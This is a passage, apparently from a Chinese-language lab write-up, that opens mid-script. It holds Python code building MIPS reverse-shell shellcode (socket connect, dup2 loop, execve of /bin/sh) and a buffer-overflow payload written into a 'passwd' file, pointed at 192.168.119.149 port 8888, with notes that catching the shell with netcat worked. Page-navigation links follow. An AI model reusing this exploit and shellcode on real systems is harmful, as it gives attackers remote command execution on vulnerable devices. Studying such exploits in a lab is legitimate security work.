#lui t6,0x7f01    mipshell+="\x35\xce"+struct.pack('2c',hosts[2],hosts[3]) #ori t6,t6,0x101    mipshell+="\xaf\xae\xff\xe6" #sw t6,-26(sp)    mipshell+="\x27\xa5\xff\xe2" #addiu a1,sp,-30    mipshell+="\x24\x0c\xff\xef" #li t4,-17    mipshell+="\x01\x80\x30\x27" #nor a2,t4,zero    mipshell+="\x24\x02\x10\x4a" #li v0,4170 #sys_connect    mipshell+="\x01\x01\x01\x0c" #syscall 0x40404    mipshell+="\x24\x11\xff\xfd" #li s1,-3    mipshell+="\x02\x20\x88\x27" #nor s1,s1,zero    mipshell+="\x8f\xa4\xff\xff" #lw a0,-1(sp)    mipshell+="\x02\x20\x28\x21" #move a1,s1 #dup2_loop    mipshell+="\x24\x02\x0f\xdf" #li v0,4063 #sys_dup2    mipshell+="\x01\x01\x01\x0c" #syscall 0x40404    mipshell+="\x24\x10\xff\xff" #li s0,-1    mipshell+="\x22\x31\xff\xff" #addi s1,s1,-1    mipshell+="\x16\x30\xff\xfa" #bne s1,s0,68 <dup2_loop>    mipshell+="\x28\x06\xff\xff" #slti a2,zero,-1    mipshell+="\x3c\x0f\x2f\x2f" #lui t7,0x2f2f "//"    mipshell+="\x35\xef\x62\x69" #ori t7,t7,0x6269 "bi"    mipshell+="\xaf\xaf\xff\xec" #sw t7,-20(sp)    mipshell+="\x3c\x0e\x6e\x2f" #lui t6,0x6e2f "n/"    mipshell+="\x35\xce\x73\x68" #ori t6,t6,0x7368 "sh"    mipshell+="\xaf\xae\xff\xf0" #sw t6,-16(sp)    mipshell+="\xaf\xa0\xff\xf4" #sw zero,-12(sp)    mipshell+="\x27\xa4\xff\xec" #addiu a0,sp,-20    mipshell+="\xaf\xa4\xff\xf8" #sw a0,-8(sp)    mipshell+="\xaf\xa0\xff\xfc" #sw zero,-4(sp)    mipshell+="\x27\xa5\xff\xf8" #addiu a1,sp,-8    mipshell+="\x24\x02\x0f\xab" #li v0,4011 #sys_execve    mipshell+="\x01\x01\x01\x0c" #syscall 0x40404    return mipshell if __name__ == '__main__':    print '[*] prapare shellcode',    cmd="sh"    cmd+="\x00"*(4-(len(cmd)%4))    payload="a"*0x194    payload+=struct.pack(">L",0x7ffff5d0)    payload+=makeshellcode('192.168.119.149',8888)    print ' ok'    print '[+]create password file',    fw=open('passwd','w')    fw.write(payload)    fw.close()    print ' ok' ubuntu现在停止不动了,但是shellcode已经执行完成了,可以在nc那边输入命令看到 这里端口号4444我试了很多次,均监听不到,后来改为8888就可以了,猜测有可能是端口占用了
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页